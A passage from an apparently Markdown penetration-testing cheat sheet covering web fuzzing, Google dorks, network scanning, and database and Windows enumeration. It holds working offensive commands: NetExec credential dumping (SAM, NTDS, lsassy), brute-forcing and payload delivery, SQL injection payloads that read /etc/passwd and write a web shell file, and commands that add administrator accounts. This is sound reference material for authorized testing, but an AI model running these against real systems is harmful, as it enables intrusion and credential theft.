| --- | | -f | Store results in the output file | | -t | Specify the number of concurrent connections (10 default) | | -s | Specify time delay between requests (0 default) | | -u | Specify a URL for the request | | -w | Specify a wordlist file | | -X | Specify an HTTP method for the request, i.e., HEAD or FUZZ | | -b | Specify a cookie for the requests | | -d | Use post data | | -H | Use header | | --hc/--hl/--hw/--hh | Hide responses with the specified code/lines/words/chars | | --sc/--sl/--sw/--sh| Show responses with the specified code/lines/words/chars | | --ss/--hs| Show/hide responses with the specified regex within the content | ### Directory Fuzzing **[`^ back to top ^`](#overview)** **Don't forget that GNU/Linux OS has a case sensitive file system, so make sure to use the right wordlists.** If you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions. The below tools support recursive directory and file search. Also, they might take a long time to finish depending on the used settings and wordlist. #### dirb **[`^ back to top ^`](#overview)** dirb [http://target.com](http://target.com) /path/to/wordlist dirb [http://target.com](http://target.com) /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old #### DirBuster **[`^ back to top ^`](#overview)** All DirBuster's wordlists are located at `/usr/share/dirbuster/wordlists/` directory. #### Dirsearch **[`^ back to top ^`](#overview)** Let's search the directories with dirsearch. dirsearch -u http://:port/ --exclude-status 403,404,400,401 -o dir Let's search with file extension: dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist dirsearch -u [https://target.com](https://target.com) -e . #### feroxbuster **[`^ back to top ^`](#overview)** Brute force directories on a web server: cat subdomains_live_long.txt | feroxbuster --stdin -k -n --auto-bail --random-agent -t 50 -T 3 --json -o feroxbuster_results.txt -s 200,301,302,401,403 -w raft-small-directories-lowercase.txt This tool is way faster than [DirBuster](#dirbuster). Filter out directories from the results: jq -r 'select(.status | tostring | test("^2")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx.txt jq -r 'select(.status | tostring | test("^2|^4")).url' feroxbuster_results.json | sort -uf | tee -a directories_2xx_4xx.txt jq -r 'select(.status | tostring | test("^3")).url' feroxbuster_results.json | sort -uf | tee -a directories_3xx.txt jq -r 'select(.status | tostring | test("^401$")).url' feroxbuster_results.json | sort -uf | tee -a directories_401.txt jq -r 'select(.status | tostring | test("^403$")).url' feroxbuster_results.json | sort -uf | tee -a directories_403.txt | Option | Description | | --- | --- | | -u | The target URL (required, unless --stdin \| --resume-from is used) | | --stdin | Read URL(s) from STDIN | | -a/-A | Sets the User-Agent (default: feroxbuster\/x.x.x) \/ Use a random User-Agent | | -x | File extension(s) to search for (ex: -x php -x pdf,js) | | -m | Which HTTP request method(s) should be sent (default: GET) | | --data | Request's body; can read data from a file if input starts with an \@(ex: \@post.bin) | | -H | Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things') | | -b | Specify HTTP cookies to be used in each request (ex: -b stuff=things) | | -Q | Request's URL query parameters (ex: -Q token=stuff -Q secret=key) | | -f | Append \/ to each request's URL | | -s | Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405) | | -T | Number of seconds before a client's request times out (default: 7) | | -k | Disables TLS certificate validation for the client | | -t | Number of concurrent threads (default: 50) | | -n | Do not scan recursively | | -w | Path to the wordlist | | --auto-bail | Automatically stop scanning when an excessive amount of errors are encountered | | -B | Automatically request likely backup extensions for "found" URLs (default: ~, .bak, .bak2, .old, .1) | | -q | Hide progress bars and banner (good for tmux windows w/ notifications) | | -o | Output file to write results to (use w/ --json for JSON entries) | #### ffuf **[`^ back to top ^`](#overview)** Directory fuzzing: ffuf -u http:///FUZZ -w /usr/share/dirb/wordlists/common.txt -mc 200,204,301,302,307 ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u "http:///FUZZ" -c Subdomain search with ffuf: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "" -H "HOST: FUZZ." -c -fs 169 #### gobuster **[`^ back to top ^`](#overview)** gobuster -u [https://target.com](https://target.com) -w /usr/share/wordlists/dirb/big.txt Let's search the directories with gobuster. In the parameters we specify the number of threads 128 (`-t`), URL (`-u`), dictionary (`-w`) and extensions we are interested in (`-x`). gobuster dir -t 128 -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi gobuster dir -t 50 -k -u http://:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' --no-error Let's search the subdomains with gobuster: gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -k gobuster vhost -u -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 20 If we see DNS server in the ports, so let's try to crawl domains: gobuster dns -d -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r :53 ### Google Dorks **[`^ back to top ^`](#overview)** Google Dork databases: * [exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database) * [cxsecurity.com/dorks](https://cxsecurity.com/dorks) * [pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking) * [opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt](https://github.com/opsdisk/pagodo/blob/master/dorks/all_google_dorks.txt) Check the list of `/.well-known/` files [here](https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml). Google Dorking will not show directories nor files that are disallowed in `robots.txt`, to check for such directories and files use [httpx](#httpx). Append `site:www.somedomain.com` to limit your scope to a specified subdomain. Append `site:*.somedomain.com` to limit your scope to all subdomains. Append `site:*.somedomain.com -www` to exclude `www` subdomain from the results. Simple Google Dorks: inurl:/robots.txt intext:disallow ext:txt inurl:/.well-known/security.txt ext:txt inurl:/info.php intext:"php version" ext:php intitle:"index of /" intext:"parent directory" intitle:"index of /.git" intext:"parent directory" inurl:/gitweb.cgi intitle:"Dashboard [Jenkins]" (intext:"mysql database" AND intext:db_password) ext:txt intext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt) ### Chad **[`^ back to top ^`](#overview)** Find and download files using a Google Dork: mkdir chad_downloads chad -nsos -o chad_downloads_results.json -dir chad_downloads -tr 200 -q "ext:txt OR ext:json OR ext:yml OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx OR ext:zip OR ext:tar OR ext:rar OR ext:gzip OR ext:7z" -s *.somedomain.com Extract authors (and more) from the files: apt -y install libimage-exiftool-perl exiftool -S chad_downloads | grep -Po '(?<=Author\:\ ).+' | sort -uf | tee -a people.txt Find directory listings using a Google Dork: chad -nsos chad_directory_listings_results.json -tr 200 -q 'intitle:"index of /" intext:"parent directory"' -s *.somedomain.com More about project at [ivan-sincek/chad](https://github.com/ivan-sincek/chad). ### PhoneInfoga **[`^ back to top ^`](#overview)** Download the latest version from [GitHub](https://github.com/sundowndev/phoneinfoga/releases) and check how to [install](#0-install-tools-and-setup) the tool. Get a phone number information: phoneinfoga scan -n +1111111111 Get a phone number information using the web UI: phoneinfoga serve Navigate to `http://localhost:5000` with your preferred web browser. ### git-dumper **[`^ back to top ^`](#overview)** Try to reconstruct a GitHub repository, i.e., get the source code, based on the commit history from a public `/.git` directory: # git-dumper git-dumper [https://somesite.com/.git](https://somesite.com/.git) git_dumper_results This tool might not be able to reconstruct the whole repository every time, but it could still reveal some sensitive information. Some additional `git` commands to try on the cloned `/.git` directory: git status git log git checkout -- . git restore . Use [Google Dorking](#google-dorks) and [Chad](#chad) to find more targets. ### TruffleHog **[`^ back to top ^`](#overview)** Installation: git clone [https://github.com/trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog) && cd trufflehog go install Search for sensitive information inside a single repository or the whole organization on GitHub: trufflehog git [https://github.com/trufflesecurity/test_keys](https://github.com/trufflesecurity/test_keys) --only-verified --json trufflehog github --org=trufflesecurity --only-verified --json Search for sensitive information inside files and directories: trufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2 ### katana **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/projectdiscovery/katana/cmd/katana@latest](https://github.com/projectdiscovery/katana/cmd/katana@latest) Crawl a website: katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u [https://somesite.com/home](https://somesite.com/home) katana -timeout 3 -retry 1 -c 30 -o katana_results.txt -ps -jc -iqp -d 1 -u subdomains_live_long_2xx.txt ### Scrapy Scraper **[`^ back to top ^`](#overview)** Crawl a website, download, and beautify minified JavaScript files: scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u [https://somesite.com/home](https://somesite.com/home) scrapy-scraper -cr 30 -a random -o scrapy_scraper_results.txt -p -r 1 -dir somedir -u subdomains_live_long_2xx.txt In case you get no results while using Playwright's headless browser, try updating it: pip3 install --upgrade playwright playwright install chromium Scrape the JavaScript files for sensitive information using [TruffleHog](#trufflehog). ### snallygaster **[`^ back to top ^`](#overview)** Download the latest version from [GitHub](https://github.com/hannob/snallygaster/releases). See how to [install](#0-install-tools-and-setup) the tool. Search a web server for sensitive files: snallygaster --nowww somesite.com | tee snallygaster_results.txt for subdomain in $(cat subdomains_live_short_http.txt); do snallygaster --nohttps --nowww "${subdomain}"; done | tee snallygaster_http_results.txt for subdomain in $(cat subdomains_live_short_https.txt); do snallygaster --nohttp --nowww "${subdomain}"; done | tee snallygaster_https_results.txt ### IIS Tilde Short name Scanning **[`^ back to top ^`](#overview)** Download: git clone [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) && cd IIS-ShortName-Scanner/release Search an IIS server for files and directories: java -jar iis_shortname_scanner.jar 2 30 [https://somesite.com](https://somesite.com) ### WhatWeb **[`^ back to top ^`](#overview)** Identify a website: whatweb -v somesite.com ### Parsero **[`^ back to top ^`](#overview)** Test all `robots.txt` entries: parsero -sb -u somesite.com ### EyeWitness **[`^ back to top ^`](#overview)** Grab screenshots from websites: eyewitness --no-prompt --no-dns --threads 5 --timeout 3 -d eyewitness_results -f subdomains_live_long.txt To check the screenshots, navigate to `eyewitness_results/screens` directory. ### Wordlists **[`^ back to top ^`](#overview)** You can find `rockyou.txt` inside `/usr/share/wordlists/` directory or inside [SecLists](https://github.com/danielmiessler/SecLists) – a useful collection of multiple types of wordlists for security assessments. Install SecLists (the collection will be stored at `/usr/share/seclists/` directory): apt update && apt install seclists Another popular wordlist collections: * [ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [xmendez/wfuzz](https://github.com/xmendez/wfuzz) * [assetnote/commonspeak2-wordlists](https://github.com/assetnote/commonspeak2-wordlists) * [weakpass.com/wordlist](https://weakpass.com/wordlist) * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) ## 2. Scanning/Enumeration **[`^ back to top ^`](#overview)** ### 2.1 Useful Websites **[`^ back to top ^`](#overview)** * [ipaddressguide.com/cidr](https://www.ipaddressguide.com/cidr) – CIDR to IP range conversion. * [account.arin.net/public/cidrCalculator](https://account.arin.net/public/cidrCalculator) – ARIN CIDR calculator. * [calculator.net/ip-subnet-calculator.html](https://www.calculator.net/ip-subnet-calculator.html) – subnet mask calculator. * [subnet-calculator.com/cidr.php](http://www.subnet-calculator.com/cidr.php) – IP subnet and CIDR calculator. * [speedguide.net/ports.php](https://www.speedguide.net/ports.php) – TCP/UDP port database. * [securityheaders.com](https://securityheaders.com) – HTTP security headers check. * [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) – Content Security Policy evaluator. * [mxtoolbox.com/blacklists.aspx](https://mxtoolbox.com/blacklists.aspx) – check IP/domain against blacklists. ### masscan **[`^ back to top ^`](#overview)** Scan all TCP and UDP ports from interface `tun0` at 1000 packets per second. masscan -e tun0 -p1-65535,U:1-65535 --rate=1000 ### rustscan **[`^ back to top ^`](#overview)** Fast scan all ports: rustscan --ulimit=5000 --range=1-65535 -a -- -A -sC ### Nmap **[`^ back to top ^`](#overview)** Ping sweep, map live hosts: nmap -sn -n 192.168.8.0/24 | grep for | cut -d" " -f5 nmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24 nmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt Extract live hosts from the results: grep -Po '(?<=Host\:\ )[^\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt Quick scan: nmap -T4 -F 192.168.8.0/24 nmap -sV -T4 -O -F --version-light 192.168.8.0/24 TCP scan, all ports: nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24 nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt Automate TCP scan: mkdir nmap_tcp_results for ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN "nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt" -p- "${ip}"; done Stealth scan: nmap -sS $ip Only open ports and banner grab: nmap -n -Pn -sS $ip --open -sV Stealth scan using FIN scan: nmap -sF $ip UDP scan, only important ports: nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24 nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt Automate UDP scan: mkdir nmap_udp_results for ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN "nmap_udp_results/nmap_udp_results_${ip//./_}.txt" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 "${subdomain}"; done Slow scan all ports: nmap --privileged -sV -sC -sS -p- -oN nmap $ip To get more information about the services that are running on the ports, let's run an nmap scan with the `-A` option. nmap -A -sV -sC $ip -p80,135,139,445 Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports: nmap -n -Pn -sS -A $ip --open -p- Nmap verbose scan, runs syn stealth, `T4` timing, OS and service version info, traceroute and scripts against services: nmap –v –sS –A –T4 $ip OS fingerprint scan: nmap -O $ip Output to a file: nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 192.168.8.0/24 | Option | Description | | --- | --- | | -sn | Ping scan – disable port scan | | -Pn | Treat all hosts as online -- skip host discovery | | -n/-R | Never do DNS resolution/Always resolve (default: sometimes) | | -sS/sT/sA | TCP SYN/Connect()/ACK | | -sU | UDP scan | | -p/-p- | Only scan specified ports/Scan all ports | | --top-ports | Scan most common ports | | -sV | Probe open ports to determine service/version info | | -O | Enable OS detection | | -sC | Same as --script=default | | --script | Script scan (takes time to finish) | | --script-args | Provide arguments to scripts | | --script-help | Show help about scripts | | -oN/-oX/-oG | Output scan in normal, XML, and Grepable format | | -v | Increase verbosity level (use -vv or more for greater effect) | | --reason | Display the reason a port is in a particular state | | -A | Enable OS detection, version detection, script scanning, and traceroute | NSE examples: nmap -nv --script='mysql-brute' --script-args='userdb="users.txt", passdb="rockyou.txt"' 192.168.8.5 -p 3306 nmap -nv --script='dns-brute' --script-args='dns-brute.domain="somedomain.com", dns-brute.hostlist="subdomains-top1mil.txt"' nmap -nv --script='ssl-heartbleed' -iL cidrs.txt ### NetExec **[`^ back to top ^`](#overview)** apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec Installation via Poetry: apt install -y libssl-dev libffi-dev python-dev-is-python3 build-essential git clone https://github.com/Pennyw0rth/NetExec cd NetExec poetry install poetry run NetExec Modules: netexec ldap -L netexec mysql -L netexec smb -L netexec ssh -L netexec winrm -L Common commands: netexec smb -u '' -p '' --shares netexec smb -u '' -p '' --shares -M spider_plus netexec smb -u '' -p '' --shares -M spider_plus -o READ_ONLY=false netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true netexec smb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999 netexec smb -u '' -p '' --share --get-file netexec smb -u 'guest' -p '' --shares --rid-brute netexec smb -u 'guest' -p '' --shares --rid-brute 100000 netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' netexec smb -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\\' '{print $2}' netexec smb -u '' --use-kcache --users netexec smb -u '' --use-kcache --sam netexec smb -u '' -p '' --shares netexec smb -u '' -p '' --shares --dir netexec smb -u '' -p '' --shares --dir "FOLDER" netexec smb -u '' -p '' --sam netexec smb -u '' -p '' --lsa netexec smb -u '' -p '' --dpapi netexec smb -u '' -p '' --local-auth --sam netexec smb -u '' -p '' --local-auth --lsa netexec smb -u '' -p '' --local-auth --dpapi netexec smb -u '' -p '' -M enum_av netexec smb -u '' -p '' -M wcc netexec smb -u '' -p '' -M snipped netexec smb -u '' -p '' -M lsassy netexec smb -u '' -p '' -M backup_operator netexec smb -u '' -p '' -M web_delivery -o URL=http:/// netexec smb -u '' -p '' -M gpp_autologin netexec smb -u '' -p '' -M gpp_password netexec smb -u '' -p '' -M powershell_history netexec smb -u '' -p '' -M coerce_plus -o LISTENER= netexec smb -u '' -p '' --ntds netexec smb -u '' -H '' --ntds netexec smb -u '' -p '' --ntds --user netexec smb -u '' -H '' --ntds --user netexec smb -u '' -H '' -x "whoami" netexec smb /PATH/TO/FILE/ --gen-relay-list netexec ldap -u '' -p '' -M -user-desc netexec ldap -u '' -p '' -M get-desc-users netexec ldap -u '' -p '' -M ldap-checker netexec ldap -u '' -p '' -M veeam netexec ldap -u '' -p '' -M maq netexec ldap -u '' -p '' -M adcs netexec ldap -u '' -p '' -M zerologon netexec ldap -u '' -p '' -M petitpotam netexec ldap -u '' -p '' -M nopac netexec ldap -u '' -p '' --use-kcache -M whoami netexec ldap -u '' -p '' --kerberoasting hashes.kerberoasting netexec ldap -u '' -p '' --asreproast hashes.asreproast netexec ldap -u '' -p '' --gmsa netexec ldap -u '' -p '' --gmsa -k netexec ldap -u '' -p '' --gmsa-convert-id netexec ldap -u '' -p '' --gmsa-decrypt-lsa netexec ldap -u '' -p '' --find-delegation netexec ldap -u '' -p '' -M get-network -o ALL=true netexec ldap -u '' -p '' --bloodhound -ns -c All netexec ldap -u '' --use-kcache --bloodhound --dns-tcp --dns-server -c All netexec winrm /24 -u '' -p '' -d . netexec winrm -u /t -p '' -d '' netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ netexec winrm -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --ignore-pw-decoding netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --no-bruteforce --continue-on-success netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --shares --continue netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --pass-pol netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --lusers netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --sam netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ --wdigest enable netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'quser' netexec -u /PATH/TO/FILE/ -p /PATH/TO/WORDLIST/ -x 'net user Administrator /domain' --exec-method smbexec ### NFS **[`^ back to top ^`](#overview)** Check which directories are exported via NFS. apt install nfs-common /sbin/showmount --exports Mount to the local folder: mount -t nfs :/mnt/backups /mnt/ ### Samba **[`^ back to top ^`](#overview)** Connect as anonymous: smbclient ///anonymous Get shares that access for user: smbmap -H -u "USERNAME" -p "PASSWORD" Connect as user: smbclient ///SHARE_NAME -U USERNAME Password for [WORKGROUP\USERNAME]: Download from samba folder: smbget -R smb:///anonymous ### SNMP **[`^ back to top ^`](#overview)** Walking MIB's via `snmpwalk`: snmpwalk -c COMMUNITY -v VERSION target_ip snmpwalk -c public -v1 snmpwalk -c public -v2c Specific MIB node: snmpwalk -c community -v version Target IP MIB Node # Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25 snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25 snmp-check: snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY snmp-check -t 172.20.10.5 snmp-check -t 172.20.10.5 -c public Nmap SNMPv3 enumeration: ```shell nmap -sV -p 161 --script=snmp-info 172.20.10.0/24 ### testssl.sh **[`^ back to top ^`](#overview)** Installation: apt update && apt -y install testssl.sh Test an SSL/TLS certificate (e.g., SSL/TLS ciphers, protocols, etc.): testssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com You can also use `testssl.sh` to exploit SSL/TLS vulnerabilities. ### OpenSSL **[`^ back to top ^`](#overview)** Test a web server for Heartbleed vulnerability: for subdomain in $(cat subdomains_live.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}:443" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt for subdomain in $(cat subdomains_live_short_https.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt ### keytool **[`^ back to top ^`](#overview)** Grab SSL/TLS certificate: keytool -printcert -rfc -sslserver somesite.com > keytool_results.txt openssl x509 -noout -text -in keytool_results.txt Use [uncover](#uncover) with Shodan and Censys SSL/TLS Dorks to find more in-scope subdomains. ### uncover **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/projectdiscovery/uncover/cmd/uncover@latest](https://github.com/projectdiscovery/uncover/cmd/uncover@latest) Set your API keys in `/root/.config/uncover/provider-config.yaml` as following: shodan: - SHODAN_API_KEY censys: - CENSYS_API_ID:CENSYS_API_SECRET Gather IPs based on the SSL/TLS certificate subject common name (CN): uncover -json -o uncover_cert_shodan_results.json -l 100 -e shodan -q 'ssl.cert.subject.CN:"*.somedomain.com"' uncover -json -o uncover_cert_censys_results.json -l 100 -e censys -q 'cert.parsed.subject.common_name:"*.somedomain.com"' ### Databases **[`^ back to top ^`](#overview)** #### MYSQL **[`^ back to top ^`](#overview)** **Try remote default root access:** mysql -h target_ip -u root -p **Login:** mysql -u user -h localhost -D database -p **Skip password:** mysql -u user -h localhost -D database --password='passwd' **Execute SQL Command:** mysql -u user -h localhost -D database --password='passwd' -e 'command' **Enumeration commands for privileges:** SHOW GRANTS FOR CURRENT_USER(); SHOW GRANTS FOR 'root'@'localhost'; SELECT * FROM mysql.user; # All Databases SHOW DATABASES; # Use Database USE databasename; # All Tables SHOW TABLES; # All data from table SELECT * FROM tablename; # For better output, add `\G` instead of `;` at the end. # All columns/infos from table describe tablename; **Queries:** # Get Version version() @@version # Current User user() # Current DB database() # User privileges SELECT super_priv FROM mysql.user UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- - # All Databases group_concat(Schema_NAME,"\r\n") FROM Information_Schema.SCHEMATA # All tables from DB group_concat(TABLE_NAME) FROM Information_Schema.TABLES WHERE TABLE_SCHEMA = 'db_name' UNION SELECT table_name,NULL,FROM information_schema.tables # All columns for all tabels in database group_concat(COLUMN_NAME) FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' # Get table and column name at once group_concat(TABLE_NAME,' : ',COLUMN_NAME,'\r\n') FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db' # All columns for one table group_concat(COLUMN_NAME) FROM Information_Schema.COLUMNS WHERE TABLE_SCHEMA = 'db_name' AND TABLE_NAME = 'table_name' # Show Input from table group_concat(role,' : ',name,' : ',email,' : ',password,'\r\n') from users # List Password Hashes SELECT host, user, password FROM mysql.user; **Read files:** union select 1,2,3,LOAD_FILE('/etc/passwd')-- - Union Select TO_base64(LOAD_FILE("/var/www/html/index.php"))-- - **Writing files** (checking the `secure_file_priv` value, empty means we can read/write files): UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - SELECT * from users INTO OUTFILE '/tmp/credentials'; select 'file written successfully!' into outfile '/var/www/html/proof.txt' **PHP code:** union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - **Attack types:** # Union Select ## Detect number of columns using `order by` ' order by 1-- - ## Detect number of columns using Union injection: cn' UNION select 1,2,3-- - union select 1,2,3,version()-- - # Error Based ## MariaDB payloads and extractvalue(1,concat(0x7e,version()))-- - AND (extractvalue(1,concat(0x7e,version()))) and updatexml(1,concat(0x0a,version()),null)-- - and (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)-- - ## Get pieces from output: and extractvalue(0,concat(0,(select (select mid(,1,99)) from . limit 0,1))) # Or and extractvalue(0,concat(0,substring((select from . limit 0,1) from 1))) IudGPHd9pEKiee9MkJ7ggPD89q3Yn… # We got the first 32 chars from the output,because the function `extractvalue()` only return this length of a string! echo -n 'IudGPHd9pEKiee9MkJ7ggPD89q3Y' | wc -c # Now change the index to 1+29 = 30 (29 because the … is 3 and 32-3=29) and extractvalue(0x7e,concat(0x7e,substring((select from . limit 0,1) from 30))) # "ndctnPeRQOmS2PQ7QIrbJEomFVG6" and the next index is 1+29+29 = 59 # When you see less then 32 chars, the output is finised and you can set limit 0,1 to limit 1,1 and so on limit 2,1 # Blind SQLi ## 5 sec to retrieve the response: and sleep(5)# # length(database())=X count up until the output and length(database())=4# #### MSSQL **[`^ back to top ^`](#overview)** Information gathering: nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip Connect to MSSQL database and check dir content: impacket-mssqlclient -p 1433 -dc-ip DOMAIN/Operator:operator@ -windows-auth SQL (MANAGER\Operator guest@master)> xp_dirtree "C:\inetpub\wwwroot\",0,1; Get version: -q "SELECT @@Version" Get current database: -q "SELECT DB_NAME() AS [Current Database]" Get all database names: -q "SELECT name FROM sys.databases" -q "Select name from sysdatabases" -q "SELECT name FROM master.dbo.sysdatabases" Get all table names: -q "SELECT table_name from core_app.INFORMATION_SCHEMA.TABLES" Get all content from table: -q "SELECT * from [core_app].[dbo].tbl_users" #### PostgreSQL **[`^ back to top ^`](#overview)** psql "postgresql://$DB_USER:$DB_PWD@$DB_SERVER/$DB_NAME" psql -U postgres -W -h localhost -d cozyhosting psql "postgresql://postgres:PASSWORD@localhost:5432/cozyhosting" psql -U postgres -W -h localhost -d cozyhosting Password: \list List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -------------+----------+----------+-------------+-------------+----------------------- cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres (4 rows) \c cozyhosting Password: You are now connected to database "cozyhosting" as user "postgres". \d List of relations Schema | Name | Type | Owner --------+--------------+----------+---------- public | hosts | table | postgres public | hosts_id_seq | sequence | postgres public | users | table | postgres (3 rows) SELECT * FROM users; name | password | role -----------+--------------------------------------------------------------+------- kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin (2 rows) #### sqlite **[`^ back to top ^`](#overview)** Connect to `.sqlite` database and dump data: sqlite3 1.sqlite sqlite> .dump PRAGMA foreign_keys=OFF; BEGIN TRANSACTION; CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL); INSERT INTO users VALUES('emily','PASSWORD'); CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL); COMMIT; Get tables and select from it: sqlite> .tables sqlite> select * from accounts_customuser; ### Windows OS Enumeration **[`^ back to top ^`](#overview)** #### Windows Basic Commands **[`^ back to top ^`](#overview)** systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" Users: net users Info about a user: net user USER Change USER PASSWORD: net user USER NEW_PASSWORD Add User: net users USER /add Adding a user into a group net group Administrators USER /add net localgroup Administrators USER /add net group "Remote Desktop User" USER /add Groups: net groups net localgroups Whoami: whoami whoami /all IP / Interfaces: ipconfig /all Routes: route print ARP table: arp -A List process: tasklist Query current drives on system: fsutil fsinfo drives List users that can use RDP qwinsta #### nbtstat **[`^ back to top ^`](#overview)** How to see the status of a server: nbtstat -a nbtstat -a 10.10.1.100 Whats is available there: net view Target_IP net view 10.10.1.100 Explore it: net use < A_drive > \\Target_IP\SHARE_NAME net use K: \\10.10.1.100\Dados #### winfo **[`^ back to top ^`](#overview)** NUll Session: winfo < IP_Address > (-v verbose) (-n Null Session) winfo – Enumarate: winfo < IP_Address> -u #### nbtscan **[`^ back to top ^`](#overview)** nbtscan -r 172.16.1.0/24 #### smblcient **[`^ back to top ^`](#overview)** NUll Session: smbclient -L //172.168.1.5 -N No Password but with User: smbclient -L //172.168.1.5 -N -U Administrator smbclient //172.168.1.5/path -N smbclient //172.168.1.5/path -U DOMAIN\\administrator #### rpcclient **[`^ back to top 